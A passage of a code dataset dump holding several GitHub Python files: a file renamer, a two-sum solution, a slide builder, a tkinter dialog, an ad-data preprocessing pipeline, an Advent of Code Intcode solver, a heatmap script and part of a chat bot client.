Table.xlsx', ## Rename excel table\n dtype = {'Input Filename': str, 'Output Filename': str}) \n\nfor index, row in filenameTable.iterrows(): # For each row \n input_name = str(row[\"Input Filename\"]) # Input/original filename\n output_name = str(row[\"Output Filename\"]) # Output/new filename\n\n input_name = dir + \"\\\\\" + input_name # \n output_name = dir + \"\\\\\" + output_name # Append filename to directory\n\n os.rename(input_name, output_name) # Rename file from input_name to output_name\n","repo_name":"Dynamack/Python-Scripts","sub_path":"Rename Files.py","file_name":"Rename Files.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14327419098","text":"\nclass Solution(object):\n def twoSum(self, nums, target):\n dic={}\n diff=0\n for i in range(len(nums)):\n diff = target - nums[i]\n if(diff in dic.keys()):\n return [dic[diff],i]\n else:\n dic[nums[i]] = i\n\n","repo_name":"DeepSavla/LeetCode","sub_path":"0001-two-sum/0001-two-sum.py","file_name":"0001-two-sum.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34707173999","text":"#!/usr/bin/env python\n# encoding: UTF-8\n\nimport sys\n\nFOOTNOTE = '.footnote[%s]'\nTITLE = '''\ntemplate: inverse\n%s\n'''\nPAGE = '''\nlayout: false\n.left-column[\n%s\n]\n.right-column[\n%s\n]\n'''\nroot = ''\nprevious = []\n\ndef process(page):\n global root, previous\n lines = page.split('\\n')\n if lines[-1].startswith('\\\\'):\n lines[-1] = FOOTNOTE % lines[-1][1:]\n if lines[0].startswith('/'):\n items = lines[0].split('/')[1:]\n if items[0] != root:\n root = items[0]\n previous = []\n if len(items) > 1:\n previous.append(items[1])\n path = \"### %s\" % root\n for prev in previous[-6:]:\n path += '\\n#### - %s' % prev\n return PAGE % (path, '\\n'.join(lines[1:]))\n else:\n return TITLE % '\\n'.join(lines)\n\n\ndef main(filename):\n with open(filename) as stream:\n text = stream.read().strip()\n pages = [p.strip() for p in text.split('---')]\n processed = [process(p) for p in pages]\n with open('template.html') as stream:\n template = stream.read()\n html = template.replace('', '\\n---\\n'.join(processed))\n with open('index.html', 'w') as stream:\n stream.write(html)\n\n\nif __name__ == '__main__':\n filename = 'readme.md'\n if len(sys.argv) > 1:\n filename = sys.argv[1]\n main(filename)\n\n","repo_name":"GoGang/RetourDExperience","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"74100500203","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nfrom ttkthemes import ThemedTk, THEMES\r\nfrom tkinter import messagebox\r\nimport sys\r\nwith open('necessaries/help.txt','r') as helpfile:\r\n lines= helpfile.readlines()\r\n help =''\r\n help = help.join(line for line in lines)\r\ndef helpWin(root,e=None):\r\n infowin = Toplevel(root)\r\n infowin.grab_set()\r\n #infowin.grab_release()\r\n infowin.title('help')\r\n infowin.geometry(\"640x410+255+190\")\r\n infowin.resizable(0,0)\r\n aboutImg = PhotoImage(file='icons/about.png')\r\n conImg = PhotoImage(file='icons/tick.png')\r\n infowin.tk.call('wm', 'iconphoto', infowin._w, aboutImg)\r\n lbl = Label(infowin,text=\"Custom Tkinter DialogBox Example Help Wizard! \",font=('arial',10,'bold','underline')).pack(fill=X,pady=3)\r\n ###\r\n f = Frame(infowin)\r\n f.pack(fill=BOTH,padx=5)\r\n yscrollbar = Scrollbar(f)\r\n yscrollbar.pack( side = RIGHT, fill = Y )\r\n txtbox = Text(f,height=21,yscrollcommand = yscrollbar.set,wrap=WORD)\r\n txtbox.pack(fill=BOTH,padx=5)\r\n\r\n txtbox.insert(END,help)\r\n #\r\n yscrollbar.config( command = txtbox.yview )\r\n okBtn = ttk.Button(infowin,text=\" Quit \",image=conImg,compound=LEFT,\r\n style='C.TButton',cursor=\"hand2\",command=infowin.destroy)\r\n okBtn.pack(side=TOP,pady=3)\r\n ###\r\n txtbox.config(state=DISABLED)\r\n infowin.mainloop()\r\n","repo_name":"Manav1918/custom-dialogbox-tkinter","sub_path":"tk theme example/dialogbox.py","file_name":"dialogbox.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73772409964","text":"#!/usr/bin/env python\n# coding=utf-8\nimport os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime,timedelta\nimport gc\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n\ndef handle_ad_op(ad_static_path,ad_operation_path,ad_op_mid_path):\n if not os.path.exists(ad_static_path):\n logging.info(ad_static_path + ' not exits')\n return\n if not os.path.exists(ad_operation_path):\n logging.info(ad_operation_path + ' not exits')\n return\n if os.path.exists(ad_op_mid_path):\n logging.info(ad_op_mid_path + ' already exits')\n return\n \n ## static ad\n static_feature_names = ['ad_id','create_time','ad_acc_id','good_id','good_class','ad_trade_id','ad_size']\n ad_static_df = pd.read_csv(ad_static_path,delimiter = '\\t',\\\n parse_dates = ['create_time'],header=None,names = static_feature_names,dtype={'ad_id':int,\"ad_acc_id\": int,\\\n \"good_id\": str, \"good_class\": str, \"ad_trade_id\": str,'ad_size':str}) \n \n logging.info(ad_static_path +' load success')\n\n ad_static_df['create_datetime'] = pd.to_datetime(ad_static_df['create_time'],unit='s')\n ad_static_df['create_datetime'] = ad_static_df['create_datetime'].astype(str)\n\n \n # operation ad\n operation_names = ['ad_id','create_update_time','op_type','op_set','op_value']\n\n ad_op_df = pd.read_csv(ad_operation_path,delimiter = '\\t',header=None,names = operation_names,\\\n dtype={\"ad_id\": int,'create_update_time':int,\"op_type\": int,\"op_set\": int, \"op_value\": object})\n\n logging.info(ad_operation_path +' load success')\n \n '''\n 将create_update_time不为0的时间修改成‘2015-04-07 09:43:55’格式\n '''\n def convert_time(x):\n x = str(x)\n return x[0:4] + '-' + x[4:6] + '-' + x[6:8] + ' ' + x[8:10] + ':' + x[10:12] + ':' + x[12:14]\n\n ad_op_df.loc[ad_op_df['create_update_time'] != 0,'create_update_time']=ad_op_df['create_update_time'].apply(convert_time)\n \n '''\n 发现很多新建的时间都为0,所以先填充时间\n '''\n ad_op_df.loc[ad_op_df['create_update_time'] == 0,'create_update_time']=ad_op_df['ad_id'].map(dict(zip(ad_static_df.ad_id,ad_static_df.create_datetime)))\n\n\n ad_op_df.sort_values(by = ['ad_id','create_update_time'],inplace=True)\n\n ad_op_df = ad_op_df.reset_index()\n ad_op_df.drop(columns = ['index'],inplace=True)\n \n ad_op_df.to_csv(ad_op_mid_path,sep='\\t',index=False)\n logging.info(ad_op_mid_path + ' dump success')\n del ad_static_df\n del ad_op_df\n gc.collect()\n \n \n \ndef handle_ad_op_by_line(ad_op_mid_path,ad_op_mid_path2):\n if not os.path.exists(ad_op_mid_path):\n logging.info(ad_op_mid_path + ' not exits')\n return\n\n if os.path.exists(ad_op_mid_path2):\n logging.info(ad_op_mid_path2 + ' already exits')\n return\n \n \n '''\n 接下来整合广告的静态数据和动态数据\n 新建的dataframe需要的列有\n ad_id\n create_time\n ad_acc_id\n good_id\n good_class\n ad_trade_id\n ad_size\n target_people:目标人群\n deliver_time:投放时段\n ad_bid:出价\n valid_time:广告该设置的有效时间,字符串格式 2019-03-09 13:40:03-2019-03-09 14:40:03\n 其中唯一索引是ad_id 和 valid_time\n\n\n 在整合动态,静态数据之前,首先需要整合动态数据\n 动态数据的列有:\n ad_id\n ad_bid\n deliver_time\n target_people\n valid_time\n '''\n \n ad_op_df = pd.read_csv(ad_op_mid_path,delimiter='\\t')\n with open(ad_op_mid_path2,'w') as w:\n w.write('ad_id\\tad_bid\\tdeliver_time\\ttarget_people\\tvalid_time\\n')\n\n # 遍历广告的动态流水数据\n # ad_id\tcreate_update_time\top_type\top_set\top_value\n\n ad_id = ''\n ad_bid = None\n deliver_time = ''\n target_people = ''\n valid_start_time = ''\n\n index = 0\n\n logging.info('begin handle ad operation data')\n\n for print_index,row in ad_op_df.iterrows():\n if print_index % 10000 == 0:\n logging.info('read %d lines'%print_index)\n #logging.info(print_index)\n # 如果是新建类型\n if row['op_type'] == 2:\n # 广告出价\n if row['op_set'] ==2:\n ad_bid = int(row['op_value'])\n # 人群定向\n elif row['op_set'] == 3:\n target_people = row['op_value']\n # 投放时段\n elif row['op_set'] == 4:\n #deliver_time = convertStr2Interval(row['op_value'])\n deliver_time = row['op_value']\n # time\\id\n valid_start_time = row['create_update_time']\n ad_id = row['ad_id']\n continue\n # 修改类型\n elif row['op_type'] == 1:\n # 是同一个ad_id\n if row['ad_id'] == ad_id:\n # 如果修改的是广告出价\n if row['op_set'] == 2:\n # 需要将之前的数据插入到新的data中\n w.write(str(ad_id) + '\\t' + str(ad_bid) + '\\t' + str(deliver_time) + '\\t' + str(target_people) + '\\t' + str(valid_start_time) + '-' + str(row['create_update_time']) + '\\n')\n# new_op_df.loc[index,'ad_id'] = ad_id\n# new_op_df.loc[index,'ad_bid'] = ad_bid\n# new_op_df.loc[index,'deliver_time'] = deliver_time\n# new_op_df.loc[index,'target_people'] = target_people\n# new_op_df.loc[index,'valid_time'] = valid_start_time + '-' + row['create_update_time']\n\n # 重新设置时间段\n valid_start_time = row['create_update_time']\n ad_bid = int(row['op_value'])\n index += 1\n\n # 如果修改的是投放时段\n if row['op_set'] == 4:\n # 需要将之前的数据插入到新的data中\n# new_op_df.loc[index,'ad_id'] = ad_id\n# new_op_df.loc[index,'ad_bid'] = ad_bid\n# new_op_df.loc[index,'deliver_time'] = deliver_time\n# new_op_df.loc[index,'target_people'] = target_people\n# new_op_df.loc[index,'valid_time'] = valid_start_time + '-' + row['create_update_time']\n w.write(str(ad_id) + '\\t' + str(ad_bid) + '\\t' + str(deliver_time) + '\\t' + str(target_people) + '\\t' + str(valid_start_time) + '-' + str(row['create_update_time']) + '\\n')\n # 重新设置时间段\n valid_start_time = row['create_update_time']\n #deliver_time = convertStr2Interval(row['op_value'])\n deliver_time = row['op_value']\n index += 1\n\n # 如果修改的是人群定向\n if row['op_set'] == 3:\n # 需要将之前的数据插入到新的data中\n# new_op_df.loc[index,'ad_id'] = ad_id\n# new_op_df.loc[index,'ad_bid'] = ad_bid\n# new_op_df.loc[index,'deliver_time'] = deliver_time\n# new_op_df.loc[index,'target_people'] = target_people\n# new_op_df.loc[index,'valid_time'] = valid_start_time + '-' + row['create_update_time']\n w.write(str(ad_id) + '\\t' + str(ad_bid) + '\\t' + str(deliver_time) + '\\t' + str(target_people) + '\\t' + str(valid_start_time) + '-' + str(row['create_update_time']) + '\\n')\n # 重新设置时间段\n valid_start_time = row['create_update_time']\n target_people = row['op_value']\n index += 1\n\n\n # 如果修改的是广告状态\n if row['op_set'] == 1:\n # 如果设置为无效\n if row['op_value'] == '0':\n# new_op_df.loc[index,'ad_id'] = ad_id\n# new_op_df.loc[index,'ad_bid'] = ad_bid\n# new_op_df.loc[index,'deliver_time'] = deliver_time\n# new_op_df.loc[index,'target_people'] = target_people\n# new_op_df.loc[index,'valid_time'] = valid_start_time + '-' + row['create_update_time']\n w.write(str(ad_id) + '\\t' + str(ad_bid) + '\\t' + str(deliver_time) + '\\t' + str(target_people) + '\\t' + str(valid_start_time) + '-' + str(row['create_update_time']) + '\\n')\n # 重新设置时间段\n valid_start_time = ''\n index += 1\n else:\n valid_start_time = row['create_update_time']\n \n w.flush()\n logging.info('end handle ad operation data by line')\n del ad_op_df\n gc.collect()\n\ndef merge(ad_static_path,ad_op_mid_path,ad_merge_path):\n if not os.path.exists(ad_static_path):\n logging.info(ad_static_path + ' not exits')\n return\n if not os.path.exists(ad_op_mid_path):\n logging.info(ad_op_mid_path + ' not exits')\n return\n if os.path.exists(ad_merge_path):\n logging.info(ad_merge_path + ' already exits')\n return\n \n ## static ad\n static_feature_names = ['ad_id','create_time','ad_acc_id','good_id','good_class','ad_trade_id','ad_size']\n ad_static_df = pd.read_csv(ad_static_path,delimiter = '\\t',\\\n parse_dates = ['create_time'],header=None,names = static_feature_names,dtype={'ad_id':object,\"ad_acc_id\": int,\\\n \"good_id\": str, \"good_class\": str, \"ad_trade_id\": str,'ad_size':str}) \n \n logging.info(ad_static_path +' load success')\n \n \n new_op_df = pd.read_csv(ad_op_mid_path,delimiter = '\\t')\n new_op_df['ad_id'] = new_op_df['ad_id'].astype(object)\n #pd.DataFrame(columns = ['ad_id','ad_bid','deliver_time','target_people','valid_time'])\n logging.info(ad_op_mid_path +' load success')\n \n\n # 看起来处理的好像比较成功,因为都是新建后修改\n # 接下来就是处理时间,将字符串转换成范围\n #ad_static_df['ad_id'] = ad_static_df['ad_id'].astype(object)\n # 将这个数据与静态数据合并\n new_op_df = new_op_df.merge(ad_static_df,on = 'ad_id',how = 'left')\n new_op_df.drop(columns = ['create_time'],inplace=True)\n\n logging.info('merge success')\n new_op_df.to_csv(ad_merge_path,sep='\\t')\n logging.info(ad_merge_path + ' dump success')\n \n '''\n 可以看出每天曝光广告的基本数据,接下来需要构建必要的信息\n 创建时间\n 广告行业id\n 商品类型\n 商品ID\n 广告账户id\n 投放时段\n 人群定向\n 出价\n\n 其中投放时段,人群定向,出价属于动态数据,不同的时间其可能不同\n\n 接下来就是要确定曝光的时刻,这些动态的具体数值\n\n 怎么确定?\n 需要将动态数据和静态数据进行结合\n '''\n\ndef main():\n ad_static_path = '../data/testA/ad_static_feature.out'\n ad_operation_path = '../data/testA/ad_operation.dat'\n ad_op_mid_path = '../data/testA/ad_op_mid.txt'\n ad_op_mid_path2 = '../data/testA/ad_op_mid2.txt'\n ad_merge_path = '../data/testA/ad_static_dynamic_merge.csv'\n \n handle_ad_op(ad_static_path,ad_operation_path,ad_op_mid_path)\n handle_ad_op_by_line(ad_op_mid_path,ad_op_mid_path2)\n merge(ad_static_path,ad_op_mid_path2,ad_merge_path)\n\n\n\n\n# 将时间转换测试\ndef convertOneStr2Interval(x):\n x = int(x)\n bin_str = bin(x)[2:]\n bin_len = len(bin_str)\n r_pos = bin_str.rfind('1')\n if bin_len % 2 == 0:\n end_date = str(bin_len//2) + ':00'\n else:\n end_date = str(bin_len//2) + ':30'\n\n interval = bin_len - r_pos - 1\n if interval % 2 == 0:\n begin_date = str(interval//2) + ':00'\n else:\n begin_date = str(interval//2) + ':30'\n return begin_date + '-' + end_date \n\ndef convertStr2Interval(x):\n res_str = ''\n time_list = x.split(',')\n for time in time_list:\n res_str += convertOneStr2Interval(time) + ','\n return res_str[:-1]\n\n \n \nif __name__ == '__main__':\n main()\n","repo_name":"fengjiaxin/tencent_2019_game","sub_path":"code/process_ad_data.py","file_name":"process_ad_data.py","file_ext":"py","file_size_in_byte":12705,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"8705593553","text":"#Day 17\npath = 'aoc2019_day17.txt'\nday17 = dict()\nindex = 0\nwith open(path) as f:\n for l in f:\n for n in l.rstrip().split(','):\n day17[index] = int(n)\n index += 1\n \ndef process_opcode(prog, position, inpt, rel_base):\n inst = str(prog[position]).zfill(5)\n opcode = int(inst[3:])\n param1_mode = int(inst[2])\n param2_mode = int(inst[1])\n param3_mode = int(inst[0])\n stop = 0\n new_pos = None\n outpt = None\n \n def get_value(param, mode, rel_base):\n if mode == 0:\n val_pos = prog.get(position+param, 0)\n val = prog.get(val_pos, 0)\n elif mode == 1:\n val = prog.get(position+param, 0)\n elif mode == 2:\n val_pos = rel_base + prog.get(position+param, 0)\n val = prog.get(val_pos, 0)\n #print('Value '+str(param)+', mode '+str(mode)+' = '+str(val))\n return val\n \n def find_output_pos(param, mode, rel_base):\n if mode == 0:\n out_pos = prog.get(position+param, 0)\n elif mode == 2:\n out_pos = rel_base + prog.get(position+param, 0)\n #print('Value '+str(param)+', mode '+str(mode)+', output position = '+str(out_pos))\n return out_pos\n \n if opcode == 1:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n output_pos = find_output_pos(3, param3_mode, rel_base)\n prog[output_pos] = val1 + val2\n new_pos = position+4\n #print('Opcode 1 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', '+str(val1)+' + '+str(val2)+' = '+str(val1 + val2)+', saved at position '+str(output_pos))\n \n elif opcode == 2:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n output_pos = find_output_pos(3, param3_mode, rel_base)\n prog[output_pos] = val1 * val2\n new_pos = position+4\n #print('Opcode 2 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', '+str(val1)+' * '+str(val2)+' = '+str(val1 * val2)+', saved at position '+str(output_pos))\n \n elif opcode == 3:\n output_pos = find_output_pos(1, param1_mode, rel_base)\n prog[output_pos] = inpt\n new_pos = position+2\n #print('Opcode 3 '+str(inst)+','+str(prog[position+1])+', input '+str(inpt)+' saved at position '+str(output_pos))\n \n elif opcode == 4:\n outpt = get_value(1, param1_mode, rel_base)\n new_pos = position+2\n #print('Opcode 4 '+str(inst)+','+str(prog[position+1])+', output = '+str(outpt))\n \n elif opcode == 5:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n if val1 != 0: new_pos = val2\n else: new_pos = position+3\n #print('Opcode 5 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+', val1 = '+str(val1)+', jumping to position '+str(new_pos))\n \n elif opcode == 6:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n if val1 == 0: new_pos = val2\n else: new_pos = position+3\n #print('Opcode 6 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+', val1 = '+str(val1)+', jumping to position '+str(new_pos))\n \n elif opcode == 7:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n output_pos = find_output_pos(3, param3_mode, rel_base)\n if val1 < val2: \n prog[output_pos] = 1\n #print('Opcode 7 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', 1 saved at position '+str(output_pos))\n else: \n prog[output_pos] = 0\n #print('Opcode 7 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', 0 saved at position '+str(output_pos))\n new_pos = position+4\n \n elif opcode == 8:\n val1 = get_value(1, param1_mode, rel_base)\n val2 = get_value(2, param2_mode, rel_base)\n output_pos = find_output_pos(3, param3_mode, rel_base)\n if val1 == val2: \n prog[output_pos] = 1\n #print('Opcode 8 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', 1 saved at position '+str(output_pos))\n else: \n prog[output_pos] = 0\n #print('Opcode 8 '+str(inst)+','+str(prog[position+1])+','+str(prog[position+2])+','+str(prog[position+3])+', 0 saved at position '+str(output_pos))\n new_pos = position+4\n \n elif opcode == 9:\n val1 = get_value(1, param1_mode, rel_base)\n rel_base = rel_base + val1\n new_pos = position+2\n #print('Opcode 9 '+str(inst)+','+str(prog[position+1])+', relative base = '+str(rel_base))\n \n elif opcode == 99:\n stop = 1\n #print('Opcode 99 '+str(inst))\n \n return stop, new_pos, outpt, rel_base\n\ndef run_part1(prog,panels):\n pos = 0\n rel_base = 0\n stop = 0\n inpt = None\n view = ''\n x = 0\n y = 0\n \n while True:\n stop, pos, outpt, rel_base = process_opcode(prog, pos, inpt, rel_base)\n \n if outpt != None:\n view = view + chr(outpt)\n if stop == 1: \n print(view)\n break\n \n for c in view:\n panels[(x,y)] = dict()\n panels[(x,y)]['char'] = c\n panels[(x,y)]['type'] = None\n panels[(x,y)]['visited'] = 0\n x += 1\n if c == '\\n': \n y += 1\n x = 0\n \n return panels\n\nday17_copy = day17.copy()\npanels = dict()\npanels = run_part1(day17_copy,panels)\n\npart1_sum = 0\nrobot_coords = None\nrobot_dir = None\nfor panel in panels:\n x = panel[0]\n y = panel[1]\n north = 0\n south = 0\n east = 0\n west = 0\n if (x,y-1) in panels and panels[(x,y-1)]['char'] in ['^', 'v', '<', '>', '#']: north = 1\n if (x,y+1) in panels and panels[(x,y+1)]['char'] in ['^', 'v', '<', '>', '#']: south = 1\n if (x+1,y) in panels and panels[(x+1,y)]['char'] in ['^', 'v', '<', '>', '#']: east = 1\n if (x-1,y) in panels and panels[(x-1,y)]['char'] in ['^', 'v', '<', '>', '#']: west = 1\n panels[panel]['north'] = north\n panels[panel]['south'] = south\n panels[panel]['east'] = east\n panels[panel]['west'] = west\n \n if panels[panel]['char'] in ['^', 'v', '<', '>']:\n panels[panel]['type'] = 'start'\n robot_coords = panel\n if panels[panel]['char'] == '^': robot_dir = 'N'\n elif panels[panel]['char'] == 'v': robot_dir = 'S'\n elif panels[panel]['char'] == '<': robot_dir = 'W'\n elif panels[panel]['char'] == '>': robot_dir = 'E'\n elif panels[panel]['char'] == '#' and north == 1 and south == 1 and east == 1 and west == 1:\n part1_sum += x*y\n panels[panel]['type'] = 'intersection'\n elif panels[panel]['char'] == '#' and ((north == 1 and south == 1) or (east == 1 and west == 1)):\n panels[panel]['type'] = 'straight'\n elif panels[panel]['char'] == '#' and ((north == 1 and (east == 1 or west == 1)) or (south == 1 and (east == 1 or west == 1))):\n panels[panel]['type'] = 'elbow'\n elif panels[panel]['char'] == '#' and (north == 1 or south == 1 or east == 1 or west == 1):\n panels[panel]['type'] = 'end'\n \nprint('Part 1:',part1_sum)\n\ndef determine_dir(panels,robot_coords,robot_dir):\n turn = ''\n if robot_dir == 'N' and panels[robot_coords]['north'] == 0:\n if panels[robot_coords]['east'] == 1:\n robot_dir = 'E'\n turn = 'R,'\n elif panels[robot_coords]['west'] == 1:\n robot_dir = 'W'\n turn = 'L,'\n elif robot_dir == 'S' and panels[robot_coords]['south'] == 0:\n if panels[robot_coords]['east'] == 1:\n robot_dir = 'E'\n turn = 'L,'\n elif panels[robot_coords]['west'] == 1:\n robot_dir = 'W'\n turn = 'R,'\n elif robot_dir == 'W' and panels[robot_coords]['west'] == 0:\n if panels[robot_coords]['north'] == 1:\n robot_dir = 'N'\n turn = 'R,'\n elif panels[robot_coords]['south'] == 1:\n robot_dir = 'S'\n turn = 'L,'\n elif robot_dir == 'E' and panels[robot_coords]['east'] == 0:\n if panels[robot_coords]['north'] == 1:\n robot_dir = 'N'\n turn = 'L,'\n elif panels[robot_coords]['south'] == 1:\n robot_dir = 'S'\n turn = 'R,'\n return robot_dir, turn\n\ndef move_robot(robot_coords,robot_dir):\n x = robot_coords[0]\n y = robot_coords[1]\n if robot_dir == 'N': y -= 1\n elif robot_dir == 'S': y += 1\n elif robot_dir == 'E': x += 1\n elif robot_dir == 'W': x -= 1\n robot_coords = (x,y)\n return robot_coords\n\n#Trying to find a viable path, only turning at elbows for now\npath = ''\nmoves = 0\nwhile True:\n panels[robot_coords]['visited'] = 1\n if panels[robot_coords]['type'] == 'end':\n path += str(moves)\n print('Reached end!')\n print(path)\n break\n elif panels[robot_coords]['type'] == 'start':\n robot_dir, turn = determine_dir(panels,robot_coords,robot_dir)\n path += turn\n robot_coords = move_robot(robot_coords,robot_dir)\n moves += 1\n elif panels[robot_coords]['type'] in ['straight', 'intersection']:\n robot_coords = move_robot(robot_coords,robot_dir)\n moves += 1\n elif panels[robot_coords]['type'] == 'elbow':\n path += str(moves)+','\n moves = 0\n robot_dir, turn = determine_dir(panels,robot_coords,robot_dir)\n path += turn\n robot_coords = move_robot(robot_coords,robot_dir)\n moves += 1\n\n#check that all scaffold panels were visited:\nmissed = 0\nfor panel in panels:\n if panels[panel]['char'] == '#' and panels[panel]['visited'] == 0:\n missed += 1\nprint('Scaffold panels missed:',missed)\n\n#manually determined function patterns\nmain_str = 'A,A,B,B,C,B,C,B,C,A\\n'\nmain_ascii = list()\nfor c in main_str:\n main_ascii.append(ord(c))\na_str = 'L,10,L,10,R,6\\n'\na_ascii = list()\nfor c in a_str:\n a_ascii.append(ord(c))\nb_str = 'R,12,L,12,L,12\\n'\nb_ascii = list()\nfor c in b_str:\n b_ascii.append(ord(c))\nc_str = 'L,6,L,10,R,12,R,12\\n'\nc_ascii = list()\nfor c in c_str:\n c_ascii.append(ord(c))\nvideo_str = 'n\\n'\nvideo_ascii = list()\nfor c in video_str:\n video_ascii.append(ord(c))\ninputs = main_ascii + a_ascii + b_ascii + c_ascii + video_ascii\n\ndef run_part2(prog,inputs):\n pos = 0\n rel_base = 0\n stop = 0\n inpt = None\n input_count = 0\n \n while True:\n if str(prog[pos])[-1] == '3':\n inpt = inputs[input_count]\n input_count += 1\n stop, pos, outpt, rel_base = process_opcode(prog, pos, inpt, rel_base)\n \n if outpt != None:\n final_output = outpt\n if stop == 1:\n break\n \n return final_output\n\n\nday17_copy = day17.copy()\n#Force the vacuum robot to wake up by changing the value in your ASCII program at address 0 from 1 to 2\nday17_copy[0] = 2\npart2 = run_part2(day17_copy,inputs)\nprint('Part 2:',part2)","repo_name":"a-m-edwards/adventofcode","sub_path":"aoc2019_day17.py","file_name":"aoc2019_day17.py","file_ext":"py","file_size_in_byte":11215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13664360998","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('processedDataForVisual.csv')\n\ndata = data.iloc[:,1:]\n\ndata_corr = data.corr()\nplt.figure(figsize=(25,25),dpi=200)\nplt.rcParams['font.sans-serif'] = ['SimHei'] # 中文字体设置-黑体\nplt.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题\nsns.set(font='SimHei',font_scale=1.5) # 解决Seaborn中文显示问题并调整字体大小\n\n# 使用mask去掉上半\nmask = np.zeros_like(data_corr, dtype=np.bool)\nmask[np.triu_indices_from(mask)] = True\n\nsns.heatmap(data_corr,\n mask=mask,\n annot=True,\n vmax=1,\n square=True,\n cmap=\"Greens\")\nplt.savefig('./correlation.png')\nplt.show()","repo_name":"bit704/Information-System-of-Second-hand-House","sub_path":"数据预处理/爬虫/correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40131943666","text":"import asyncio\nimport inspect\nimport logging\nfrom typing import Dict, List, Callable, Coroutine, Union, IO\n\nfrom . import api\nfrom .channel import public_channel_factory, PublicChannel, Channel\nfrom .game import Game\nfrom .gateway import Gateway, Requestable\nfrom .guild import Guild\nfrom .interface import AsyncRunnable, MessageTypes\nfrom .message import RawMessage, Event, PublicMessage, PrivateMessage\nfrom .user import User\n\nlog = logging.getLogger(__name__)\n\nTypeHandler = Callable[[Union['Message', 'Event']], Coroutine]\n\n\nclass Client(Requestable, AsyncRunnable):\n \"\"\"\n The bridge between khl.py internal components and khl server.\n\n Translates network package into khl.py concepts/object for internal to use.\n\n reminder: Client.loop only used to run handle_event() and registered handlers.\n \"\"\"\n _handler_map: Dict[MessageTypes, List[TypeHandler]]\n\n def __init__(self, gate: Gateway):\n self.gate = gate\n self.ignore_self_msg = True\n self._me = None\n\n self._handler_map = {}\n self._pkg_queue = asyncio.Queue()\n\n def register(self, type: MessageTypes, handler: TypeHandler):\n if not asyncio.iscoroutinefunction(handler):\n raise TypeError('handler must be a coroutine.')\n\n params = list(inspect.signature(handler).parameters.values())\n if len(params) != 1 or not issubclass(params[0].annotation, RawMessage):\n raise TypeError('handler must have one and only one param, and the param inherits RawMessage')\n\n if type not in self._handler_map:\n self._handler_map[type] = []\n self._handler_map[type].append(handler)\n\n async def handle_pkg(self):\n \"\"\"\n consume `pkg` from `event_queue`\n \"\"\"\n while True:\n pkg: Dict = await self._pkg_queue.get()\n log.debug(f'upcoming pkg: {pkg}')\n\n try:\n await self._consume_pkg(pkg)\n except Exception as e:\n log.exception(e)\n\n self._pkg_queue.task_done()\n\n async def _consume_pkg(self, pkg: Dict):\n \"\"\"\n spawn `msg` according to `pkg`,\n check if ignore msgs from self\n pass `msg` to corresponding handlers defined in `_handler_map`\n \"\"\"\n msg = self._make_msg(pkg)\n if self.ignore_self_msg and msg.type != MessageTypes.SYS:\n if msg.author.id == (await self.fetch_me()).id:\n return\n self._dispatch_msg(msg)\n\n def _make_msg(self, pkg: Dict):\n if pkg.get('type') == MessageTypes.SYS.value:\n msg = Event(**pkg)\n else:\n msg = self._make_channel_msg(pkg)\n return msg\n\n def _make_channel_msg(self, pkg):\n msg = None\n channel_type = pkg.get('channel_type')\n if channel_type == 'GROUP':\n msg = PublicMessage(**pkg, _gate_=self.gate)\n elif channel_type == 'PERSON':\n msg = PrivateMessage(**pkg, _gate_=self.gate)\n else:\n log.error(f'can not make msg from pkg: {pkg}')\n return msg\n\n def _dispatch_msg(self, msg):\n if not msg:\n return\n if msg.type in self._handler_map and self._handler_map[msg.type]:\n for handler in self._handler_map[msg.type]:\n asyncio.ensure_future(self._handle_safe(handler)(msg), loop=self.loop)\n\n @staticmethod\n def _handle_safe(handler: TypeHandler):\n\n async def safe_handler(msg):\n try:\n await handler(msg)\n except Exception as e:\n log.exception(f'error raised during message handling', exc_info=e)\n\n return safe_handler\n\n async def create_asset(self, file: Union[IO, str]) -> str:\n \"\"\"upload ``file`` to khl, and return the url to the file\n\n if ``file`` is a str, ``open(file, 'rb')`` will be called to convert it into IO\n \"\"\"\n file = open(file, 'rb') if isinstance(file, str) else file\n return (await self.gate.exec_req(api.Asset.create(file=file)))['url']\n\n async def fetch_me(self, force_update: bool = False) -> User:\n \"\"\"fetch detail of the ``User`` on the client\"\"\"\n if force_update or not self._me or not self._me.is_loaded():\n self._me = User(_gate_=self.gate, _lazy_loaded_=True, **(await 